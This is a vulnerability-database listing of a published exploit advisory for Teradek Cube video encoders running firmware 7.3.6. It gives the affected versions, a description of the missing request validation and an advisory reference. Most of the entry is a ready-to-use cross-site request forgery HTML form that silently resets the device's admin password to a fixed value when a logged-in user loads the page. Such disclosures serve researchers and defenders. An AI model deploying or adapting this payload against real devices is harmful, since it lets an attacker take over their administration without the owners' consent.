Lucene search
K

Teradek Cube 7.3.6 Change Password Cross Site Request Forgery

🗓️ 22 May 2018 00:00:00Reported by LiquidWormType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 36 Views

Teradek Cube 7.3.6 CSRF Change Password Exploit. Allows unauthorized password change via HTTP request

Code
`<!--  
  
Teradek Cube 7.3.6 CSRF Change Password Exploit  
  
  
Vendor: Teradek, LLC  
Product web page: https://www.teradek.com  
Affected version: Firmware Version: 7.3.6 (build 26850)  
Hardware Version: 1.5  
Teradek Firmware Version 7.3.15  
  
  
Summary: Cube packs world-class video quality into a rugged, portable  
chassis for quick IP video deployments at any location. Each encoder  
and decoder includes HDMI and 3G-SDI I/O, Ethernet / WiFI connectivity,  
and full duplex IFB.  
  
Desc: The application interface allows users to perform certain actions  
via HTTP requests without performing any validity checks to verify the  
requests. This can be exploited to perform certain actions with administrative  
privileges if a logged-in user visits a malicious web site.  
  
Tested on: lighttpd/1.4.31  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2018-5464  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5464.php  
  
  
02.03.2018  
  
-->  
  
  
<html>  
<body>  
<form action="http://127.0.0.1/cgi-bin/system.cgi" method="POST">  
<input type="hidden" name="command" value="password" />  
<input type="hidden" name="pw1" value="P@ssw0rd" />  
<input type="hidden" name="pw2" value="P@ssw0rd" />  
<input type="hidden" name="user" value="admin" />  
<input type="hidden" name="action" value="Change Password" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation